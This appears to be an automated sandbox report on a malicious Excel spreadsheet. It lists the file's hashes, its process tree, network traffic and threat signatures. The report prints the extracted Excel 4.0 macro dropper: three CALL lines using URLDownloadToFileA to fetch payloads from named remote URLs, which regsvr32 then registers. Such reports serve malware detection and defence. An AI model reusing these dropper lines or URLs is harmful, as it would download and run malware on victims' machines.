Analysis

  • max time kernel
    118s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
  • submitted
    20/11/2024, 22:55 UTC

General

  • Target

    486011410d80fc17aaa070ed2bbb0367419b79fb77da01d503f84fad4dffe342.xls

  • Size

    46KB

  • MD5

    8b65052cfc75035cea9fa038e3da2a54

  • SHA1

    620871171c230d38bc48614992f4eb7366f41287

  • SHA256

    486011410d80fc17aaa070ed2bbb0367419b79fb77da01d503f84fad4dffe342

  • SHA512

    1e1e8ffb6fd4705da82eeff11f37216a11d2ee903f9174de8836fe0b1a7da7bb8d920cb18d1622d58909eee517d627172b26cc1a09837ce80b21140a31448f97

  • SSDEEP

    768:pDMPKpb8rGYrMPe3q7Q0XV5xtezE8vpI8UM+VQTUs77quK7KtGu6w:pYKpb8rGYrMPe3q7Q0XV5xtezE8vG8UW

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://zktecovn.com/wp-admin/xxfnYY4zwOpFOgu3g1t/", "..\wdusx1.ocx")
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://zacharywythe.com/pb_index_bak/SkEGB2c/", "..\wdusx2.ocx")
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://zonainformatica.es/aspnet_client/pVcppgi00Dk/", "..\wdusx3.ocx")
URLs
xlm40.dropper

https://zktecovn.com/wp-admin/xxfnYY4zwOpFOgu3g1t/

xlm40.dropper

http://zacharywythe.com/pb_index_bak/SkEGB2c/

xlm40.dropper

http://zonainformatica.es/aspnet_client/pVcppgi00Dk/

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\486011410d80fc17aaa070ed2bbb0367419b79fb77da01d503f84fad4dffe342.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2112
    • C:\Windows\SysWOW64\regsvr32.exe
      C:\Windows\System32\regsvr32.exe /S ..\wdusx1.ocx
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      PID:2472
    • C:\Windows\SysWOW64\regsvr32.exe
      C:\Windows\System32\regsvr32.exe /S ..\wdusx2.ocx
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      PID:2344
    • C:\Windows\SysWOW64\regsvr32.exe
      C:\Windows\System32\regsvr32.exe /S ..\wdusx3.ocx
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      PID:2608

Network

  • flag-us
    DNS
    zktecovn.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    zktecovn.com
    IN A
    Response
    zktecovn.com
    IN A
    103.110.87.36
  • flag-vn
    GET
    https://zktecovn.com/wp-admin/xxfnYY4zwOpFOgu3g1t/
    EXCEL.EXE
    Remote address:
    103.110.87.36:443
    Request
    GET /wp-admin/xxfnYY4zwOpFOgu3g1t/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: zktecovn.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    expires: Wed, 11 Jan 1984 05:00:00 GMT
    cache-control: no-cache, must-revalidate, max-age=0
    content-type: text/html; charset=UTF-8
    link: <https://zktecovn.com/wp-json/>; rel="https://api.w.org/"
    content-encoding: gzip
    vary: Accept-Encoding
    transfer-encoding: chunked
    date: Wed, 20 Nov 2024 22:55:44 GMT
    server: LiteSpeed
    x-xss-protection: 1;mode=block
    x-frame-options: SAMEORIGIN
    referrer-policy: strict-origin-when-cross-origin
    x-content-type-options: nosniff
    x-powered-by: WPTangTocOLS
    permissions-policy: accelerometer=(), camera=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), payment=(), usb=()
    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
    connection: Keep-Alive
  • flag-us
    DNS
    r11.o.lencr.org
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    r11.o.lencr.org
    IN A
    Response
    r11.o.lencr.org
    IN CNAME
    o.lencr.edgesuite.net
    o.lencr.edgesuite.net
    IN CNAME
    a1887.dscq.akamai.net
    a1887.dscq.akamai.net
    IN A
    88.221.134.137
    a1887.dscq.akamai.net
    IN A
    88.221.134.89
    a1887.dscq.akamai.net
    IN A
    88.221.135.105
    a1887.dscq.akamai.net
    IN A
    88.221.135.115
  • flag-gb
    GET
    http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgM8bmk8NiM6sFCZmd6yiQNRHQ%3D%3D
    EXCEL.EXE
    Remote address:
    88.221.134.137:80
    Request
    GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgM8bmk8NiM6sFCZmd6yiQNRHQ%3D%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: r11.o.lencr.org
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Content-Type: application/ocsp-response
    Content-Length: 504
    ETag: "3014725AE5ECD24A3DC6B0885C5B415FD9688144DB225B8419BD22C743668052"
    Last-Modified: Mon, 18 Nov 2024 21:33:00 UTC
    Cache-Control: public, no-transform, must-revalidate, max-age=21600
    Expires: Thu, 21 Nov 2024 04:55:43 GMT
    Date: Wed, 20 Nov 2024 22:55:43 GMT
    Connection: keep-alive
  • flag-us
    DNS
    zacharywythe.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    zacharywythe.com
    IN A
    Response
    zacharywythe.com
    IN A
    192.250.237.63
  • flag-ca
    GET
    http://zacharywythe.com/pb_index_bak/SkEGB2c/
    EXCEL.EXE
    Remote address:
    192.250.237.63:80
    Request
    GET /pb_index_bak/SkEGB2c/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: zacharywythe.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 403 Forbidden
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    content-type: text/html
    content-length: 20
    content-encoding: gzip
    vary: Accept-Encoding,User-Agent
    date: Wed, 20 Nov 2024 22:55:45 GMT
    server: LiteSpeed
  • flag-us
    DNS
    zonainformatica.es
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    zonainformatica.es
    IN A
    Response
    zonainformatica.es
    IN A
    82.98.170.50
  • flag-es
    GET
    http://zonainformatica.es/aspnet_client/pVcppgi00Dk/
    EXCEL.EXE
    Remote address:
    82.98.170.50:80
    Request
    GET /aspnet_client/pVcppgi00Dk/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: zonainformatica.es
    Connection: Keep-Alive
    Response
    HTTP/1.1 301 Moved Permanently
    Content-Type: text/html; charset=UTF-8
    Location: https://zonainformatica.es/aspnet_client/pVcppgi00Dk/
    Server: Microsoft-IIS/10.0
    X-Powered-By: ASP.NET
    Date: Wed, 20 Nov 2024 22:55:44 GMT
    Content-Length: 176
  • flag-es
    GET
    https://zonainformatica.es/aspnet_client/pVcppgi00Dk/
    EXCEL.EXE
    Remote address:
    82.98.170.50:443
    Request
    GET /aspnet_client/pVcppgi00Dk/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Connection: Keep-Alive
    Host: zonainformatica.es
    Response
    HTTP/1.1 404 Not Found
    Content-Type: text/html
    Server: Microsoft-IIS/10.0
    X-Powered-By: ASP.NET
    Date: Wed, 20 Nov 2024 22:55:44 GMT
    Content-Length: 1245
  • flag-us
    DNS
    www.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    www.microsoft.com
    IN A
    Response
    www.microsoft.com
    IN CNAME
    www.microsoft.com-c-3.edgekey.net
    www.microsoft.com-c-3.edgekey.net
    IN CNAME
    www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    IN CNAME
    e13678.dscb.akamaiedge.net
    e13678.dscb.akamaiedge.net
    IN A
    95.100.245.144
  • flag-gb
    GET
    http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
    Remote address:
    95.100.245.144:80
    Request
    GET /pkiops/crl/MicCodSigPCA2011_2011-07-08.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    If-Modified-Since: Mon, 03 Jun 2024 21:25:24 GMT
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: www.microsoft.com
    Response
    HTTP/1.1 200 OK
    Content-Length: 1078
    Content-Type: application/octet-stream
    Content-MD5: PjrtHAukbJio72s77Ag5mA==
    Last-Modified: Thu, 31 Oct 2024 23:26:09 GMT
    ETag: 0x8DCFA0366D6C4CA
    x-ms-request-id: d8b251ae-001e-0067-1bed-2b4716000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Wed, 20 Nov 2024 22:56:13 GMT
    Connection: keep-alive
    TLS_version: UNKNOWN
    ms-cv: CASMicrosoftCV2c3f7533.0
    ms-cv-esi: CASMicrosoftCV2c3f7533.0
    X-RTag: RT
  • flag-us
    DNS
    crl.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    crl.microsoft.com
    IN A
    Response
    crl.microsoft.com
    IN CNAME
    crl.www.ms.akadns.net
    crl.www.ms.akadns.net
    IN CNAME
    a1363.dscg.akamai.net
    a1363.dscg.akamai.net
    IN A
    88.221.134.83
    a1363.dscg.akamai.net
    IN A
    88.221.134.146
  • flag-gb
    GET
    http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
    Remote address:
    88.221.134.83:80
    Request
    GET /pki/crl/products/MicRooCerAut2011_2011_03_22.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    If-Modified-Since: Thu, 11 Jul 2024 01:45:51 GMT
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: crl.microsoft.com
    Response
    HTTP/1.1 200 OK
    Content-Length: 1036
    Content-Type: application/octet-stream
    Content-MD5: 8M9bF5Tsp81z+cAg2quO8g==
    Last-Modified: Thu, 26 Sep 2024 02:21:11 GMT
    ETag: 0x8DCDDD1E3AF2C76
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 37b0a847-001e-003a-4dc7-0f4d92000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Wed, 20 Nov 2024 22:56:14 GMT
    Connection: keep-alive
  • 103.110.87.36:443
    https://zktecovn.com/wp-admin/xxfnYY4zwOpFOgu3g1t/
    tls, http
    EXCEL.EXE
    1.5kB
    23.6kB
    17
    24

    HTTP Request

    GET https://zktecovn.com/wp-admin/xxfnYY4zwOpFOgu3g1t/

    HTTP Response

    404
  • 88.221.134.137:80
    http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgM8bmk8NiM6sFCZmd6yiQNRHQ%3D%3D
    http
    EXCEL.EXE
    521 B
    2.0kB
    6
    4

    HTTP Request

    GET http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgM8bmk8NiM6sFCZmd6yiQNRHQ%3D%3D

    HTTP Response

    200
  • 192.250.237.63:80
    http://zacharywythe.com/pb_index_bak/SkEGB2c/
    http
    EXCEL.EXE
    658 B
    513 B
    7
    6

    HTTP Request

    GET http://zacharywythe.com/pb_index_bak/SkEGB2c/

    HTTP Response

    403
  • 82.98.170.50:80
    http://zonainformatica.es/aspnet_client/pVcppgi00Dk/
    http
    EXCEL.EXE
    619 B
    556 B
    6
    3

    HTTP Request

    GET http://zonainformatica.es/aspnet_client/pVcppgi00Dk/

    HTTP Response

    301
  • 82.98.170.50:443
    https://zonainformatica.es/aspnet_client/pVcppgi00Dk/
    tls, http
    EXCEL.EXE
    1.1kB
    4.6kB
    9
    8

    HTTP Request

    GET https://zonainformatica.es/aspnet_client/pVcppgi00Dk/

    HTTP Response

    404
  • 95.100.245.144:80
    http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
    http
    393 B
    1.7kB
    4
    4

    HTTP Request

    GET http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl

    HTTP Response

    200
  • 88.221.134.83:80
    http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
    http
    399 B
    1.7kB
    4
    4

    HTTP Request

    GET http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl

    HTTP Response

    200
  • 8.8.8.8:53
    zktecovn.com
    dns
    EXCEL.EXE
    58 B
    74 B
    1
    1

    DNS Request

    zktecovn.com

    DNS Response

    103.110.87.36

  • 8.8.8.8:53
    r11.o.lencr.org
    dns
    EXCEL.EXE
    61 B
    192 B
    1
    1

    DNS Request

    r11.o.lencr.org

    DNS Response

    88.221.134.137
    88.221.134.89
    88.221.135.105
    88.221.135.115

  • 8.8.8.8:53
    zacharywythe.com
    dns
    EXCEL.EXE
    62 B
    78 B
    1
    1

    DNS Request

    zacharywythe.com

    DNS Response

    192.250.237.63

  • 8.8.8.8:53
    zonainformatica.es
    dns
    EXCEL.EXE
    64 B
    80 B
    1
    1

    DNS Request

    zonainformatica.es

    DNS Response

    82.98.170.50

  • 8.8.8.8:53
    www.microsoft.com
    dns
    63 B
    230 B
    1
    1

    DNS Request

    www.microsoft.com

    DNS Response

    95.100.245.144

  • 8.8.8.8:53
    crl.microsoft.com
    dns
    63 B
    162 B
    1
    1

    DNS Request

    crl.microsoft.com

    DNS Response

    88.221.134.83
    88.221.134.146

MITRE ATT&CK Enterprise v15

Downloads

  • memory/2112-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2112-1-0x000000007275D000-0x0000000072768000-memory.dmp

    Filesize

    44KB

  • memory/2112-16-0x000000007275D000-0x0000000072768000-memory.dmp

    Filesize

    44KB
